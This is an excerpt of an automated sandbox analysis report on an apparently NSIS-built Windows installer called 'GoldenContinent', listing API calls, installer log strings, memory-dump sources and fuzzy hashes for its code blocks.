                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00048A00,00000064,00111F1B), ref: 00403295
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
